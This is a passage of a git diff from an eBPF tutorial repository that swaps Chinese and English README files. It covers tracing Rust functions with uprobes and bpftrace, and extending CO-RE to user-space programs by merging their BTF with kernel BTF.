4 in 5 return value: 9 ``` -而且看起来 bpftrace 并不能正确获取参数: +It also appears that bpftrace cannot correctly read the argument: ```console $ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" @@ -128,7 +128,7 @@ Attaching 1 probe... Function hello-world called 63642464 ``` -Uretprobe 捕捉到了第一次调用的返回值: +The uretprobe did catch the return value, but only for the first call: ```console $ sudo bpftrace -e 'uretprobe:args/tar @@ -139,10 +139,10 @@ Attaching 1 probe... Function hello-world called 6 ``` -这可能是由于 Rust 没有稳定的 ABI。 Rust,正如它迄今为止所存在的那样,保留了以任何它想要的方式对这些结构成员进行排序的权利。 因此,被调用者的编译版本可能会完全按照上面的方式对成员进行排序,而调用库的编程的编译版本可能会认为它实际上是这样布局的: +This may be because Rust does not have a stable ABI. Rust, as it exists today, reserves the right to lay out data structures and pass arguments in any way it wants, so the compiled callee and the compiled caller of a library may disagree about how the same values are actually laid out and passed. -TODO: 进一步分析(未完待续) +TODO: Further analysis (to be continued) -## 参考资料 +## References - diff --git a/src/37-uprobe-rust/README.zh.md b/src/37-uprobe-rust/README.zh.md new file mode 100644 index 0000000..191c3d7 --- /dev/null +++ b/src/37-uprobe-rust/README.zh.md @@ -0,0 +1,148 @@ +# eBPF 实践:使用 Uprobe 追踪用户态 Rust 应用 + +eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 + +本文讨论如何使用 Uprobe 和 eBPF 追踪用户态 Rust 应用,包括如何获取符号名称并 attach、获取函数参数、获取返回值等。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 + +## Uprobe + +Uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后续的指令。 + +uprobe 适用于在用户态去解析一些内核态探针无法解析的流量,例如 http2 流量,https 流量,同时也可以分析程序运行时、业务逻辑等。关于 Uprobe 的更多信息,可以参考: + +- [eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据](../30-sslsniff/README.md) +- [eBPF 实践教程:使用 uprobe 捕获 Golang 的协程切换](../31-goroutine/README.md) +- [eBPF 实践教程:使用 uprobe 捕获用户态 http2 流量](../32-http2/README.md) + +Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF Uprobe 程序,和内核态的 eBPF 兼容,由于避免了内核态和用户态之间的上下文切换,bpftime 的 Uprobe 开销比内核少约 10 倍,并且也更容易扩展。 + +## Rust + +Rust 是一种开源的系统编程语言,注重安全、速度和并行性。它于2010年由Graydon Hoare在Mozilla研究中心开发,并于2015年发布了第一个稳定版本。Rust 语言的设计哲学旨在提供C++的性能优势,同时大幅减少内存安全漏洞。Rust在系统编程领域逐渐受到欢迎,特别是在需要高性能、安全性和可靠性的应用场景,例如操作系统、文件系统、游戏引擎、网络服务等领域。许多大型技术公司,包括Mozilla、Google、Microsoft和Amazon等,都在使用或支持Rust语言。 + +可以参考 [Rust 官方网站](https://www.rust-lang.org/) 了解更多 Rust 语言的信息,并安装 Rust 的工具链。 + +## 最简单的例子:Symbol name mangling + +我们先来看一个简单的例子,使用 Uprobe 追踪 Rust 程序的 `main` 函数,代码如下: + +```rust +pub fn hello() -> i32 { + println!("Hello, world!"); + 0 +} + +fn main() { + hello(); +} +``` + +构建和尝试获取符号: + +```console +$ cd helloworld +$ cargo build +$ nm helloworld/target/release/helloworld | grep hello +0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E +``` + +我们会发现,对应的符号被转换为了 `_ZN10helloworld4main17h2dce92cb81426b91E`,这是因为 rustc 使用 [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) 来为代码生成过程中使用的符号编码一个唯一的名称。编码后的名称会被链接器用于将名称与所指向的内容关联起来。可以使用 -C symbol-mangling-version 选项来控制符号名称的处理方法。 + +我们可以使用 [`rustfilt`](https://crates.io/crates/rustfilt) 工具来解析和获取对应的符号: + +```console +$ cargo install rustfilt +$ nm helloworld/target/release/helloworld
> name.txt +$ rustfilt _ZN10helloworld4main17h2dce92cb81426b91E +helloworld::main +$ rustfilt -i name.txt | grep hello +0000000000008b60 t helloworld::main +``` + +接下来我们可以尝试使用 bpftrace 跟踪对应的函数: + +```console +$ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' +Attaching 1 probe... +Function hello-world called +``` + +## 一个奇怪的现象:多次调用、获取参数 + +对于一个更复杂的例子,包含多次调用和获取参数: + +```rust +use std::env; + +pub fn hello(i: i32, len: usize) -> i32 { + println!("Hello, world! {} in {}", i, len); + i + len as i32 +} + +fn main() { + let args: Vec = env::args().collect(); + + // Skip the first argument, which is the path to the binary, and iterate over the rest + for arg in args.iter().skip(1) { + match arg.parse::() { + Ok(i) => { + let ret = hello(i, args.len()); + println!("return value: {}", ret); + } + Err(_) => { + eprintln!("Error: Argument '{}' is not a valid integer", arg); + } + } + } +} +``` + +我们再次进行类似的操作,会发现一个奇怪的现象: + +```console +$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' +Attaching 1 probe... +Function hello-world called +``` + +这时候我们希望 hello 函数运行多次,但 bpftrace 中只输出了一次调用: + +```console +$ args/target/release/helloworld 1 2 3 4 +Hello, world! 1 in 5 +return value: 6 +Hello, world! 2 in 5 +return value: 7 +Hello, world! 3 in 5 +return value: 8 +Hello, world! 4 in 5 +return value: 9 +``` + +而且看起来 bpftrace 并不能正确获取参数: + +```console +$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" +, arg0); }' +Attaching 1 probe... +Function hello-world called 63642464 +``` + +Uretprobe 捕捉到了第一次调用的返回值: + +```console +$ sudo bpftrace -e 'uretprobe:args/tar +get/release/helloworld:_ZN10helloworld4main17h2dce92 +cb81426b91E { printf("Function hello-world called %d +\n", retval); }' +Attaching 1 probe... +Function hello-world called 6 +``` + +这可能是由于 Rust 没有稳定的 ABI。 Rust,正如它迄今为止所存在的那样,保留了以任何它想要的方式对这些结构成员进行排序的权利。 因此,被调用者的编译版本可能会完全按照上面的方式对成员进行排序,而调用库的编程的编译版本可能会认为它实际上是这样布局的: + +TODO: 进一步分析(未完待续) + +## 参考资料 + +- diff --git a/src/37-uprobe-rust/README_en.md b/src/37-uprobe-rust/README_en.md deleted file mode 100644 index 991871b..0000000 --- a/src/37-uprobe-rust/README_en.md +++ /dev/null @@ -1,148 +0,0 @@ -# eBPF Practice: Tracing User Space Rust Applications with Uprobe - -eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro-programs" in kernel mode, thus changing system behavior or collecting granular performance data without modifying the kernel code. - -This article discusses how to trace user space Rust applications with Uprobe and eBPF, including how to obtain symbol names and attach them, get function parameters, get return values, etc. This article is part of the eBPF developer tutorial, more detailed content can be found here: The source code is open source in the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). - -## Uprobe - -Uprobe is a user space probe. Uprobe probes allow dynamic instrumentation in user space programs, with instrumentation locations including: function entry points, specific offsets, and function return points. When we define a Uprobe, the kernel creates a fast breakpoint instruction (the int3 instruction on x86 machines) at the attached instruction. 
When the program executes this instruction, the kernel triggers an event, the program falls into kernel mode, and the probe function is called in a callback manner. After the probe function is executed, it returns to user mode to continue executing subsequent instructions. - -Uprobe is useful for parsing traffic in user space that cannot be parsed by kernel probes, such as http2 traffic, https traffic, and can also analyze runtime program, business logic, etc. For more information about Uprobe, you can refer to: - -- [eBPF practice tutorial: Use Uprobe to capture plaintext SSL/TLS data from various libraries](../30-sslsniff/README.md) -- [eBPF practice tutorial: Use Uprobe to capture Golang coroutine switching](../31-goroutine/README.md) -- [eBPF practice tutorial: Use Uprobe to capture user space http2 traffic](../32-http2/README.md) - -Running Uprobe in kernel mode eBPF might also produce significant performance overhead, in which case you might consider using user space eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user-space eBPF runtime based on LLVM JIT/AOT. It can run eBPF Uprobe programs in user mode and is compatible with kernel mode eBPF. Because it avoids context switching between user and kernel modes, bpftime's Uprobe overheads are about 10 times less than the kernel's, and it also more easy to extend. - -## Rust - -Rust is an open-source systems programming language that focuses on safety, speed, and concurrency. It was developed by Graydon Hoare at the Mozilla Research Center in 2010 and released its first stable version in 2015. The design philosophy of Rust language is to provide the performance advantages of C++ while greatly reducing memory safety vulnerabilities. Rust is gradually popular in the field of systems programming, especially in applications that require high performance, security, and reliability, such as operating systems, file systems, game engines, network services, etc. Many large technology companies, including Mozilla, Google, Microsoft, and Amazon, are using or supporting the Rust language. - -You can refer to the [official Rust website](https://www.rust-lang.org/) for more information about Rust language and install the Rust toolchain. - -## Simplest example: Symbol name mangling - -Let's start with a simple example, tracing the `main` function of a Rust program with Uprobe, with the code as follows: - -```rust -pub fn hello() -> i32 { - println!("Hello, world!"); - 0 -} - -fn main() { - hello(); -} -``` - -Build and try to get the symbol: - -```console -$ cd helloworld -$ cargo build -$ nm helloworld/target/release/helloworld | grep hello -0000000000008940 t _ZN10helloworld4main17h2dce92cb81426b91E -``` - -We find that the corresponding symbol has been converted to `_ZN10helloworld4main17h2dce92cb81426b91E`. This is because rustc uses [Symbol name mangling](https://en.wikipedia.org/wiki/Name_mangling) to encode a unique name for the symbols used in the code generation process. The encoded name will be used by the linker to associate the name with the content it points to. The -C symbol-mangling-version option can be used to control the handling of symbol names. 
- -We can use the [`rustfilt`](https://crates.io/crates/rustfilt) tool to parse and obtain the corresponding symbol: - -```console -$ cargo install rustfilt -$ nm helloworld/target/release/helloworld > name.txt -$ rustfilt _ZN10helloworld4main17h2dce92cb81426b91E -helloworld::main -$ rustfilt -i name.txt | grep hello -0000000000008b60 t helloworld::main -``` - -Next we can try to use bpftrace to trace the corresponding function: - -```console -$ sudo bpftrace -e 'uprobe:helloworld/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' -Attaching 1 probe... -Function hello-world called -``` - -## A strange phenomenon: multiple calls, getting parameters - -For a more complex example, which includes multiple calls and parameter fetching: - -```rust -use std::env; - -pub fn hello(i: i32, len: usize) -> i32 { - println!("Hello, world! {} in {}", i, len); - i + len as i32 -} - -fn main() { - let args: Vec = env::args().collect(); - - // Skip the first argument, which is the path to the binary, and iterate over the rest - for arg in args.iter().skip(1) { - match arg.parse::() { - Ok(i) => { - let ret = hello(i, args.len()); - println!("return value: {}", ret); - } - Err(_) => { - eprintln!("Error: Argument '{}' is not a valid integer", arg); - } - } - } -} -``` - -We repeat a similar operation and notice a strange phenomenon: - -```console -$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called\n"); }' -Attaching 1 probe... -Function hello-world called -``` - -At this point we expect the hello function to run several times, but bpftrace only prints out one call: - -```console -$ args/target/release/helloworld 1 2 3 4 -Hello, world! 1 in 5 -return value: 6 -Hello, world! 2 in 5 -return value: 7 -Hello, world! 3 in 5 -return value: 8 -Hello, world! 4 in 5 -return value: 9 -``` - -And it appears that bpftrace cannot correctly get the parameter: - -```console -$ sudo bpftrace -e 'uprobe:args/target/release/helloworld:_ZN10helloworld4main17h2dce92cb81426b91E { printf("Function hello-world called %d\n" -, arg0); }' -Attaching 1 probe... -Function hello-world called 63642464 -``` - -The Uretprobe did catch the return value of the first call: - -```console -$ sudo bpftrace -e 'uretprobe:args/tar -get/release/helloworld:_ZN10helloworld4main17h2dce92 -cb81426b91E { printf("Function hello-world called %d -\n", retval); }' -Attaching 1 probe... -Function hello-world called 6 -``` - -This may due to Rust does not have a stable ABI. Rust, as it has existed so far, has reserved the right to order those struct members any way it wants. 
So the compiled version of the callee might order the members exactly as above, while the compiled version of the programming calling into the library might think its actually laid out like this: - -TODO: Further analysis (to be continued) - -## References - -- diff --git a/src/38-btf-uprobe/README.md b/src/38-btf-uprobe/README.md index b45b35e..aa1a0e6 100644 --- a/src/38-btf-uprobe/README.md +++ b/src/38-btf-uprobe/README.md @@ -1,43 +1,50 @@ -# 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行 +# Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility -在现代 Linux 系统中,eBPF(扩展的 Berkeley Packet Filter)是一项强大而灵活的技术。它允许在内核中运行沙盒化程序,类似于虚拟机环境,为扩展内核功能提供了一种既安全又不会导致系统崩溃或安全风险的方法。 +> Yusheng -eBPF 中的 “co-re” 代表“一次编译、到处运行”。这是其关键特征之一,用于解决 eBPF 程序在不同内核版本间兼容性的主要挑战。eBPF 的 CO-RE 功能可以实现在不同的内核版本上运行同一 eBPF 程序,而无需重新编译。 +eBPF, short for extended Berkeley Packet Filter, is a powerful and versatile technology used in modern Linux systems. It allows for the running of sandboxed programs in a virtual machine-like environment within the kernel, providing a safe way to extend the capabilities of the kernel without the risk of crashing the system or compromising security. -利用 eBPF 的 Uprobe 功能,可以追踪用户空间应用程序并访问其内部数据结构。然而,用户空间应用程序的 CO-RE 实践目前尚不完善。本文将介绍一种新方法,利用 CO-RE 为用户空间应用程序确保 eBPF 程序在不同应用版本间的兼容性,从而避免了多次编译的需求。例如,在从加密流量中捕获 SSL/TLS 明文数据时,你或许不需要为每个版本的 OpenSSL 维护一个单独的 eBPF 程序。 +Co-RE, standing for 'Compile Once, Run Everywhere', tackles the critical issue of eBPF program compatibility across diverse kernel versions. This feature allows eBPF programs to run on various kernel versions without the need for recompilation, simplifying deployment and maintenance. -为了在用户空间应用程序中实现eBPF的“一次编译、到处运行”(Co-RE)特性,我们需要利用BPF类型格式(BTF)来克服传统eBPF程序的一些限制。这种方法的关键在于为用户空间程序提供与内核类似的类型信息和兼容性支持,从而使得eBPF程序能够更灵活地应对不同版本的用户空间应用和库。 +With eBPF Uprobe, you can also trace userspace applications and access their internal data structures. However, the CO-RE is not designed for userspace applications. This blog will introduce how to leverage CO-RE for user-space applications, ensuring eBPF Uprobe programs remain compatible across different application versions without the need for multiple compilations. -本文是eBPF开发者教程的一部分,详细内容可访问[https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。本文完整的代码请查看 。 +This approach may be particularly beneficial for tracing applications like OpenSSL, where maintaining separate eBPF programs for each version is impractical. With userspace eBPF runtimes like bpftime, you can also expand the CO-RE to more usecases, including extensions, networking, and dynamic patching, providing versatile and efficient solutions. -## 为什么我们需要CO-RE? +To implement the Co-RE feature of eBPF in user-space applications, we also need to utilize the BPF Type Format (BTF) to overcome some of the limitations of traditional eBPF programs. The key to this approach lies in providing user-space programs with similar type information and compatibility support as the kernel, thereby enabling eBPF programs to more flexibly handle different versions of user-space applications and libraries. -- **内核依赖性**:传统的eBPF程序和它们被编译的特定Linux内核版本紧密耦合。这是因为它们依赖于内核的特定内部数据结构和API,这些可能在内核版本间变化。 -- **可移植性问题**:如果你想在带有不同内核版本的不同Linux系统上运行一个eBPF程序,你通常需要为每个内核版本重新编译eBPF程序,这是一个麻烦而低效的过程。 +This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). 
The source code is available at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe). -### Co-RE的解决方案 +## Why do we need CO-RE? -- **抽象内核依赖性**:Co-RE使eBPF程序更具可移植性,通过使用BPF类型格式(BTF)和重定位来抽象特定的内核依赖。 -- **BPF类型格式(BTF)**:BTF提供了关于内核中数据结构和函数的丰富类型信息。这些元数据允许eBPF程序在运行时理解内核结构的布局。 -- **重定位**:编译支持Co-RE的eBPF程序包含在加载时解析的重定位。这些重定位根据运行内核的实际布局和地址调整程序对内核数据结构和函数的引用。 +- **Kernel Dependencies**: Traditional eBPF programs are tightly coupled with the specific Linux kernel version they are compiled for. This is because they rely on specific internal data structures and kernel APIs which can change between kernel versions. +- **Portability Issues**: If you wanted to run an eBPF program on different Linux systems with different kernel versions, you'd traditionally have to recompile the eBPF program for each kernel version, which is a cumbersome and inefficient process. -### Co-RE的优点 +### The Co-RE Solution -1. **编写一次,任何地方运行**:编译有Co-RE的eBPF程序可以在不同的内核版本上运行,无需重新编译。这大大简化了在多样环境中部署和维护eBPF程序。 -2. **安全和稳定**:Co-RE保持了eBPF的安全性,确保程序不会导致内核崩溃,遵守安全约束。 -3. **简单的开发**:开发者不需要关注每个内核版本的具体情况,这简化了eBPF程序的开发。 +- **Abstracting Kernel Dependencies**: Co-RE enables eBPF programs to be more portable by abstracting away specific kernel dependencies. This is achieved through the use of BPF Type Format (BTF) and relocations. +- **BPF Type Format (BTF)**: BTF provides rich type information about data structures and functions in the kernel. This metadata allows eBPF programs to understand the layout of kernel structures at runtime. +- **Relocations**: eBPF programs compiled with Co-RE support contain relocations that are resolved at load time. These relocations adjust the program's references to kernel data structures and functions according to the actual layout and addresses in the running kernel. -## 用户空间应用程序CO-RE的问题 +### Advantages of Co-RE -eBPF也支持追踪用户空间应用程序。Uprobe是一个用户空间探针,允许对用户空间程序进行动态仪表装置。探针位置包括函数入口、特定偏移和函数返回。 +1. **Write Once, Run Anywhere**: eBPF programs compiled with Co-RE can run on different kernel versions without the need for recompilation. This greatly simplifies the deployment and maintenance of eBPF programs in diverse environments. +2. **Safety and Stability**: Co-RE maintains the safety guarantees of eBPF, ensuring that programs do not crash the kernel and adhere to security constraints. +3. **Ease of Development**: Developers don't need to worry about the specifics of each kernel version, which simplifies the development of eBPF programs. -BTF是为内核设计的,生成自vmlinux,它可以帮助eBPF程序方便地兼容不同的内核版本。但是,用户空间应用程序也需要CO-RE。例如,SSL/TLS uprobe被广泛用于从加密流量中捕获明文数据。它是用用户空间库实现的,如OpenSSL、GnuTLS、NSS等。用户空间应用程序和库也有各种版本,如果我们需要为每个版本编译和维护eBPF程序,那就会很复杂。 +## Problem: userspace application CO-RE -下面是一些新的工具和方法,可以帮助我们为用户空间应用程序启用CO-RE。 +eBPF also supports tracing userspace applications. Uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. -## 用户空间程序的BTF +BTF is designed for the kernel and generated from vmlinux; it helps eBPF programs stay compatible with different kernel versions. + +The userspace application, however, also needs CO-RE. For example, the SSL/TLS uprobe is widely used to capture the plaintext data from encrypted traffic. It is implemented against userspace libraries such as OpenSSL, GnuTLS, NSS, etc.
The userspace application and libraries also have different versions, and it would be complex if we needed to compile and maintain the eBPF program for each version. + +Let's see what will happen if CO-RE is not enabled for userspace applications, and how BTF from userspace applications can solve this. + +## No BTF for userspace program + +This is a simple uprobe example that can capture the function call and arguments of the `add_test` function in the userspace program. You can add `#define BPF_NO_PRESERVE_ACCESS_INDEX` in `uprobe.bpf.c` to make sure the eBPF program can be compiled without BTF for `struct data`. -这是一个简单的uprobe例子,它可以捕获用户空间程序的`add_test`函数的调用和参数。你可以在`uprobe.bpf.c`中添加`#define BPF_NO_PRESERVE_ACCESS_INDEX`来确保eBPF程序可以在没有`struct data`的BTF的情况下编译。
```c #define BPF_NO_GLOBAL_DATA @@ -182,6 +191,7 @@ struct data { #pragma clang attribute pop #endif + SEC("uprobe/examples/btf-base:add_test") int BPF_UPROBE(add_test, struct data *d) { @@ -195,15 +205,15 @@ int BPF_UPROBE(add_test, struct data *d) char LICENSE[] SEC("license") = "Dual BSD/GPL"; ``` -`struct data`的记录在eBPF程序中被保留下来。然后,我们可以使用 `btf-base.btf`来编译eBPF程序。 +The record of `struct data` is preserved in the eBPF program. Then, we can use the `btf-base.btf` to compile the eBPF program. -将用户btf与内核btf合并,这样我们就有了一个完整的内核和用户空间的btf: +Merge user btf with kernel btf, so we have a complete btf for the kernel and userspace: ```sh ./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf ``` -然后我们使用用户空间程序执行eBPF程序。 对于 `btf-base`: +Then we execute the eBPF program with the userspace program. for `btf-base`: ```console $ sudo ./uprobe examples/btf-base target-base.btf @@ -215,15 +225,16 @@ libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4 ... ``` -执行用户空间程序并获取结果: +Execute the userspace program and get result: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe [sudo] password for yunwei37: <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 + ``` -还可以对另一个版本的用户空间程序`btf-base-new`做同样的操作: +Also, we do the same for another version of the userspace program `btf-base-new`: ```console $ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf @@ -245,7 +256,7 @@ libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1 Successfully started! Press Ctrl+C to stop. ``` -结果是正确的: +The result is correct: ```console $ sudo cat /sys/kernel/debug/tracing/trace_pipe @@ -253,46 +264,50 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 ``` -我们的 eBPF 追踪程序也几乎不需要进行任何修改,只需要把包含 kernel 和用户态结构体偏移量的 BTF 加载进来即可。这和旧版本内核上没有 btf 信息的使用方式是一样的: +For complete source code, you can visit [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe) for more details. + +The eBPF uprobe tracing program almost doesn't need any modifications. We just need to load the BTF containing the offsets of kernel and user-space structures. 
This is the same usage as enabling CO-RE on older kernel versions without BTF information: ```c - LIBBPF_OPTS(bpf_object_open_opts , opts, - ); - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); - if (argc != 3 && argc != 2) { - fprintf(stderr, "Usage: %s []\n", argv[0]); - return 1; - } - if (argc == 3) - opts.btf_custom_path = argv[2]; + LIBBPF_OPTS(bpf_object_open_opts , opts, + ); + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); + if (argc != 3 && argc != 2) { + fprintf(stderr, "Usage: %s []\n", argv[0]); + return 1; + } + if (argc == 3) + opts.btf_custom_path = argv[2]; - /* Set up libbpf errors and debug info callback */ - libbpf_set_print(libbpf_print_fn); + /* Set up libbpf errors and debug info callback */ + libbpf_set_print(libbpf_print_fn); - /* Cleaner handling of Ctrl-C */ - signal(SIGINT, sig_handler); - signal(SIGTERM, sig_handler); + /* Cleaner handling of Ctrl-C */ + signal(SIGINT, sig_handler); + signal(SIGTERM, sig_handler); - /* Load and verify BPF application */ - skel = uprobe_bpf__open_opts(&opts); - if (!skel) { - fprintf(stderr, "Failed to open and load BPF skeleton\n"); - return 1; - } + /* Load and verify BPF application */ + skel = uprobe_bpf__open_opts(&opts); + if (!skel) { + fprintf(stderr, "Failed to open and load BPF skeleton\n"); + return 1; + } ``` -实际上,btf 实现重定向需要两个部分,一个是 bpf 程序带的编译时的 btf 信息,一个是内核的 btf 信息。在实际加载 ebpf 程序的时候,libbpf 会根据当前内核上准确的 btf 信息,来修改可能存在错误的 ebpf 指令,确保在不同内核版本上能够兼容。 +In fact, BTF-based relocation requires two parts: the compile-time BTF information carried by the BPF program, and the BTF information of the kernel at the time the eBPF program is loaded. When actually loading the eBPF program, libbpf will patch potentially incorrect eBPF instructions based on the accurate BTF information of the current kernel, ensuring compatibility across different kernel versions. -有趣的是,实际上 libbpf 并不区分这些 btf 信息来自用户态程序还是内核,因此我们只要把用户态的重定向信息一起提供给 libbpf 进行重定向,问题就解决了。 +Interestingly, libbpf does not differentiate whether this BTF information comes from user-space programs or from the kernel. Therefore, by merging the user-space BTF information with the kernel BTF and providing it to libbpf, the problem is solved. -本文的工具和完整的代码在 开源。 +Also, since the relocation happens in the userspace loader (such as libbpf), both the kernel eBPF runtime and userspace eBPF runtimes (such as bpftime) can benefit from CO-RE. bpftime () is an open-source user-space eBPF runtime based on LLVM JIT/AOT. It enables the execution of eBPF programs in user space, compatible with kernel-space eBPF. While supporting uprobes, syscall tracing, and general plugin extensions, it avoids the context switching between kernel and user space, thereby enhancing the execution efficiency of uprobe programs. With the support of libbpf and BTF, bpftime can also dynamically extend user-space applications, achieving compatibility across different versions of user-space programs.
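+
+How might such a merge be done? The following is a minimal sketch (an assumption about the approach, not necessarily how the `merge-btf` helper used above is implemented internally) built only on libbpf's public BTF API — `btf__parse()`, `btf__add_btf()` and `btf__raw_data()` — which appends the user-space types to the kernel BTF and writes the merged blob out:
+
+```c
+/* merge_btf_sketch.c — illustrative only; assumes a libbpf version that
+ * provides btf__add_btf() (v0.6+). Build with: cc merge_btf_sketch.c -lbpf */
+#include <stdio.h>
+#include <bpf/btf.h>
+
+int main(int argc, char **argv)
+{
+    if (argc != 4) {
+        fprintf(stderr, "Usage: %s <kernel-btf> <user-btf> <output>\n", argv[0]);
+        return 1;
+    }
+    struct btf *base = btf__parse(argv[1], NULL); /* e.g. /sys/kernel/btf/vmlinux */
+    struct btf *user = btf__parse(argv[2], NULL); /* e.g. examples/base.btf from pahole */
+    if (!base || !user)
+        return 1;
+    /* Append all user-space types after the kernel types; libbpf renumbers
+     * type IDs and rewrites cross-type references automatically. */
+    if (btf__add_btf(base, user) < 0)
+        return 1;
+    /* Dump the merged raw BTF so a loader can consume it. */
+    __u32 size = 0;
+    const void *data = btf__raw_data(base, &size);
+    FILE *f = fopen(argv[3], "wb");
+    if (!f || fwrite(data, 1, size, f) != size)
+        return 1;
+    fclose(f);
+    return 0;
+}
+```
+
+A file merged this way can then be handed to the loader through `opts.btf_custom_path`, as in the snippet above.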
-## 结论 +For more details about BTF relocation, you may refer to -- **灵活性和兼容性**:在用户空间eBPF程序中使用 BTF 大大增强了它们在不同版本的用户空间应用程序和库之间的灵活性和兼容性。 -- **简化了复杂性**:这种方法显著减少了维护不同版本的用户空间应用程序的eBPF程序的复杂性,因为它消除了需要多个程序版本的需要。 -- **更广泛的应用**:这种方法在性能监控、安全和用户空间应用程序的调试等方面也可能能有更广泛的应用。bpftime(https://github.com/eunomia-bpf/bpftime) 是一个开源的基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容。它在支持 uprobe、syscall trace 和一般的插件扩展的同时,避免了内核态和用户态之间的上下文切换,从而提高了 uprobe 程序的执行效率。借助 libbpf 和 btf 的支持,bpftime 也可以更加动态的扩展用户态应用程序,实现在不同用户态程序版本之间的兼容性。 +## Conclusion -这个示例展示了 eBPF 在实践中可以将其强大的 CO-RE 功能扩展到更动态地处理用户空间应用的不同版本变化。 +- **Flexibility and Compatibility**: The use of BTF in user-space eBPF programs greatly enhances their flexibility and compatibility across different versions of user-space applications and libraries. +- **Reduced Complexity**: This approach significantly reduces the complexity involved in maintaining eBPF programs for different versions of user-space applications, as it eliminates the need for multiple program versions. +- **Potential for Broader Application**: While your example focused on SSL/TLS monitoring, this methodology may has broader applications in performance monitoring, security, and debugging of user-space applications. -如果你想了解更多关于eBPF知识和实践,你可以访问我们的教程代码库或者网站获得更多示例和完整教程。 +This example showcases a significant advancement in the practical application of eBPF, extending its powerful features to more dynamically handle user-space applications in a Linux environment. It's a compelling solution for software engineers and system administrators dealing with the complexities of modern Linux systems. + +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/38-btf-uprobe/README.zh.md b/src/38-btf-uprobe/README.zh.md new file mode 100644 index 0000000..b45b35e --- /dev/null +++ b/src/38-btf-uprobe/README.zh.md @@ -0,0 +1,298 @@ +# 借助 eBPF 和 BTF,让用户态也能一次编译、到处运行 + +在现代 Linux 系统中,eBPF(扩展的 Berkeley Packet Filter)是一项强大而灵活的技术。它允许在内核中运行沙盒化程序,类似于虚拟机环境,为扩展内核功能提供了一种既安全又不会导致系统崩溃或安全风险的方法。 + +eBPF 中的 “co-re” 代表“一次编译、到处运行”。这是其关键特征之一,用于解决 eBPF 程序在不同内核版本间兼容性的主要挑战。eBPF 的 CO-RE 功能可以实现在不同的内核版本上运行同一 eBPF 程序,而无需重新编译。 + +利用 eBPF 的 Uprobe 功能,可以追踪用户空间应用程序并访问其内部数据结构。然而,用户空间应用程序的 CO-RE 实践目前尚不完善。本文将介绍一种新方法,利用 CO-RE 为用户空间应用程序确保 eBPF 程序在不同应用版本间的兼容性,从而避免了多次编译的需求。例如,在从加密流量中捕获 SSL/TLS 明文数据时,你或许不需要为每个版本的 OpenSSL 维护一个单独的 eBPF 程序。 + +为了在用户空间应用程序中实现eBPF的“一次编译、到处运行”(Co-RE)特性,我们需要利用BPF类型格式(BTF)来克服传统eBPF程序的一些限制。这种方法的关键在于为用户空间程序提供与内核类似的类型信息和兼容性支持,从而使得eBPF程序能够更灵活地应对不同版本的用户空间应用和库。 + +本文是eBPF开发者教程的一部分,详细内容可访问[https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/)。本文完整的代码请查看 。 + +## 为什么我们需要CO-RE? + +- 